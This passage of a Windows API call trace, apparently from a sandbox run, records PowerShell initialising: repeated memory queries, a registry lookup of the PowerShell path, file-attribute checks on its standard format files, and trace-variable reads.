	[0430.016] VirtualQuery (in: lpAddress=0x26bfd0, lpBuffer=0x26ce90, dwLength=0x30 | out: lpBuffer=0x26ce90*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.017] VirtualQuery (in: lpAddress=0x26bfd0, lpBuffer=0x26ce90, dwLength=0x30 | out: lpBuffer=0x26ce90*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.017] VirtualQuery (in: lpAddress=0x26bfd0, lpBuffer=0x26ce90, dwLength=0x30 | out: lpBuffer=0x26ce90*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.017] VirtualQuery (in: lpAddress=0x26bfd0, lpBuffer=0x26ce90, dwLength=0x30 | out: lpBuffer=0x26ce90*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.017] VirtualQuery (in: lpAddress=0x26bfd0, lpBuffer=0x26ce90, dwLength=0x30 | out: lpBuffer=0x26ce90*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.019] VirtualQuery (in: lpAddress=0x26bfd0, lpBuffer=0x26ce90, dwLength=0x30 | out: lpBuffer=0x26ce90*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.025] VirtualQuery (in: lpAddress=0x26bfd0, lpBuffer=0x26ce90, dwLength=0x30 | out: lpBuffer=0x26ce90*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.025] VirtualQuery (in: lpAddress=0x26bfd0, lpBuffer=0x26ce90, dwLength=0x30 | out: lpBuffer=0x26ce90*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.025] VirtualQuery (in: lpAddress=0x26bfd0, lpBuffer=0x26ce90, dwLength=0x30 | out: lpBuffer=0x26ce90*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.025] VirtualQuery (in: lpAddress=0x26bfd0, lpBuffer=0x26ce90, dwLength=0x30 | out: lpBuffer=0x26ce90*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.026] VirtualQuery (in: lpAddress=0x26bfd0, lpBuffer=0x26ce90, dwLength=0x30 | out: lpBuffer=0x26ce90*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.026] VirtualQuery (in: lpAddress=0x26bfd0, lpBuffer=0x26ce90, dwLength=0x30 | out: lpBuffer=0x26ce90*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.026] VirtualQuery (in: lpAddress=0x26bfd0, lpBuffer=0x26ce90, dwLength=0x30 | out: lpBuffer=0x26ce90*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.026] VirtualQuery (in: lpAddress=0x26bfd0, lpBuffer=0x26ce90, dwLength=0x30 | out: lpBuffer=0x26ce90*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.031] VirtualQuery (in: lpAddress=0x26bfd0, lpBuffer=0x26ce90, dwLength=0x30 | out: lpBuffer=0x26ce90*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.130] VirtualQuery (in: lpAddress=0x26bfd0, lpBuffer=0x26ce90, dwLength=0x30 | out: lpBuffer=0x26ce90*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.131] VirtualQuery (in: lpAddress=0x26bfd0, lpBuffer=0x26ce90, dwLength=0x30 | out: lpBuffer=0x26ce90*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.131] VirtualQuery (in: lpAddress=0x26bfd0, lpBuffer=0x26ce90, dwLength=0x30 | out: lpBuffer=0x26ce90*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.131] VirtualQuery (in: lpAddress=0x26bfd0, lpBuffer=0x26ce90, dwLength=0x30 | out: lpBuffer=0x26ce90*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.132] VirtualQuery (in: lpAddress=0x26bfd0, lpBuffer=0x26ce90, dwLength=0x30 | out: lpBuffer=0x26ce90*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.132] VirtualQuery (in: lpAddress=0x26bfd0, lpBuffer=0x26ce90, dwLength=0x30 | out: lpBuffer=0x26ce90*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.132] VirtualQuery (in: lpAddress=0x26bfd0, lpBuffer=0x26ce90, dwLength=0x30 | out: lpBuffer=0x26ce90*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.132] VirtualQuery (in: lpAddress=0x26bfd0, lpBuffer=0x26ce90, dwLength=0x30 | out: lpBuffer=0x26ce90*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.133] VirtualQuery (in: lpAddress=0x26bfd0, lpBuffer=0x26ce90, dwLength=0x30 | out: lpBuffer=0x26ce90*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.133] VirtualQuery (in: lpAddress=0x26bfd0, lpBuffer=0x26ce90, dwLength=0x30 | out: lpBuffer=0x26ce90*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.133] VirtualQuery (in: lpAddress=0x26bfd0, lpBuffer=0x26ce90, dwLength=0x30 | out: lpBuffer=0x26ce90*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.133] VirtualQuery (in: lpAddress=0x26bfd0, lpBuffer=0x26ce90, dwLength=0x30 | out: lpBuffer=0x26ce90*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.133] VirtualQuery (in: lpAddress=0x26bfd0, lpBuffer=0x26ce90, dwLength=0x30 | out: lpBuffer=0x26ce90*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.135] VirtualQuery (in: lpAddress=0x26bfd0, lpBuffer=0x26ce90, dwLength=0x30 | out: lpBuffer=0x26ce90*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.137] VirtualQuery (in: lpAddress=0x26bfe0, lpBuffer=0x26cea0, dwLength=0x30 | out: lpBuffer=0x26cea0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.137] VirtualQuery (in: lpAddress=0x26bfe0, lpBuffer=0x26cea0, dwLength=0x30 | out: lpBuffer=0x26cea0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.137] VirtualQuery (in: lpAddress=0x26bfd0, lpBuffer=0x26ce90, dwLength=0x30 | out: lpBuffer=0x26ce90*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.138] VirtualQuery (in: lpAddress=0x26bfd0, lpBuffer=0x26ce90, dwLength=0x30 | out: lpBuffer=0x26ce90*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.156] VirtualQuery (in: lpAddress=0x26bfd0, lpBuffer=0x26ce90, dwLength=0x30 | out: lpBuffer=0x26ce90*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.156] VirtualQuery (in: lpAddress=0x26bfd0, lpBuffer=0x26ce90, dwLength=0x30 | out: lpBuffer=0x26ce90*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.156] VirtualQuery (in: lpAddress=0x26bfd0, lpBuffer=0x26ce90, dwLength=0x30 | out: lpBuffer=0x26ce90*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.162] CoTaskMemAlloc (cb=0x104) returned 0x1b9a9480
	[0430.162] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b9a9480, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0430.162] CoTaskMemFree (pv=0x1b9a9480) 
	[0430.164] VirtualQuery (in: lpAddress=0x26bfd0, lpBuffer=0x26ce90, dwLength=0x30 | out: lpBuffer=0x26ce90*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.173] VirtualQuery (in: lpAddress=0x26bfd0, lpBuffer=0x26ce90, dwLength=0x30 | out: lpBuffer=0x26ce90*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.220] VirtualQuery (in: lpAddress=0x26bfd0, lpBuffer=0x26ce90, dwLength=0x30 | out: lpBuffer=0x26ce90*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.221] VirtualQuery (in: lpAddress=0x26bfd0, lpBuffer=0x26ce90, dwLength=0x30 | out: lpBuffer=0x26ce90*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.221] VirtualQuery (in: lpAddress=0x26bfd0, lpBuffer=0x26ce90, dwLength=0x30 | out: lpBuffer=0x26ce90*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.221] VirtualQuery (in: lpAddress=0x26bfd0, lpBuffer=0x26ce90, dwLength=0x30 | out: lpBuffer=0x26ce90*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.221] VirtualQuery (in: lpAddress=0x26bfd0, lpBuffer=0x26ce90, dwLength=0x30 | out: lpBuffer=0x26ce90*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.222] VirtualQuery (in: lpAddress=0x26bfd0, lpBuffer=0x26ce90, dwLength=0x30 | out: lpBuffer=0x26ce90*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.223] VirtualQuery (in: lpAddress=0x26bfd0, lpBuffer=0x26ce90, dwLength=0x30 | out: lpBuffer=0x26ce90*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.224] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d488 | out: phkResult=0x26d488*=0x1c0) returned 0x0
	[0430.224] RegQueryValueExW (in: hKey=0x1c0, lpValueName="path", lpReserved=0x0, lpType=0x26d49c, lpData=0x0, lpcbData=0x26d498*=0x0 | out: lpType=0x26d49c*=0x1, lpData=0x0, lpcbData=0x26d498*=0x74) returned 0x0
	[0430.224] RegQueryValueExW (in: hKey=0x1c0, lpValueName="path", lpReserved=0x0, lpType=0x26d40c, lpData=0x0, lpcbData=0x26d408*=0x0 | out: lpType=0x26d40c*=0x1, lpData=0x0, lpcbData=0x26d408*=0x74) returned 0x0
	[0430.224] CoTaskMemAlloc (cb=0x78) returned 0x1059d0
	[0430.224] RegQueryValueExW (in: hKey=0x1c0, lpValueName="path", lpReserved=0x0, lpType=0x26d3dc, lpData=0x1059d0, lpcbData=0x26d3d8*=0x74 | out: lpType=0x26d3dc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x26d3d8*=0x74) returned 0x0
	[0430.224] CoTaskMemFree (pv=0x1059d0) 
	[0430.224] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x26d150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0430.224] SetErrorMode (uMode=0x1) returned 0x1
	[0430.224] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x26d360 | out: lpFileInformation=0x26d360*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0430.224] SetErrorMode (uMode=0x1) returned 0x1
	[0430.225] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x26d150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0430.225] SetErrorMode (uMode=0x1) returned 0x1
	[0430.225] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x26d360 | out: lpFileInformation=0x26d360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d93418, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d93418, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e03e37, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1
	[0430.225] SetErrorMode (uMode=0x1) returned 0x1
	[0430.225] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26d150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0430.225] SetErrorMode (uMode=0x1) returned 0x1
	[0430.225] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x26d360 | out: lpFileInformation=0x26d360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67f36317, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67f36317, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe6065417, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1
	[0430.225] SetErrorMode (uMode=0x1) returned 0x1
	[0430.226] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26d150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0430.226] SetErrorMode (uMode=0x1) returned 0x1
	[0430.226] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x26d360 | out: lpFileInformation=0x26d360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1
	[0430.226] SetErrorMode (uMode=0x1) returned 0x1
	[0430.226] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26d150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0430.226] SetErrorMode (uMode=0x1) returned 0x1
	[0430.226] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x26d360 | out: lpFileInformation=0x26d360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e0582f, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e0582f, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e29f95, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1
	[0430.226] SetErrorMode (uMode=0x1) returned 0x1
	[0430.226] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26d150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0430.226] SetErrorMode (uMode=0x1) returned 0x1
	[0430.227] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x26d360 | out: lpFileInformation=0x26d360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e2b98c, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e2b98c, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e76251, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1
	[0430.227] SetErrorMode (uMode=0x1) returned 0x1
	[0430.227] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26d150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0430.227] SetErrorMode (uMode=0x1) returned 0x1
	[0430.227] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x26d360 | out: lpFileInformation=0x26d360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e51ae9, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e51ae9, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e9c3af, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1
	[0430.227] SetErrorMode (uMode=0x1) returned 0x1
	[0430.227] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26d150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0430.227] SetErrorMode (uMode=0x1) returned 0x1
	[0430.227] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x26d360 | out: lpFileInformation=0x26d360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e9dda3, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e9dda3, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1
	[0430.228] SetErrorMode (uMode=0x1) returned 0x1
	[0430.228] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26d150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0430.228] SetErrorMode (uMode=0x1) returned 0x1
	[0430.228] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x26d360 | out: lpFileInformation=0x26d360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1
	[0430.228] SetErrorMode (uMode=0x1) returned 0x1
	[0430.228] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26d150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0430.228] SetErrorMode (uMode=0x1) returned 0x1
	[0430.228] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x26d360 | out: lpFileInformation=0x26d360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe603f2b9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1
	[0430.228] SetErrorMode (uMode=0x1) returned 0x1
	[0430.228] CoTaskMemAlloc (cb=0x104) returned 0x1b9a9480
	[0430.228] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b9a9480, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0430.229] CoTaskMemFree (pv=0x1b9a9480) 
	[0430.229] CoTaskMemAlloc (cb=0x104) returned 0x1b9a9480
	[0430.229] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b9a9480, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0430.230] CoTaskMemFree (pv=0x1b9a9480) 
	[0430.230] CoTaskMemAlloc (cb=0x104) returned 0x1b9a9480
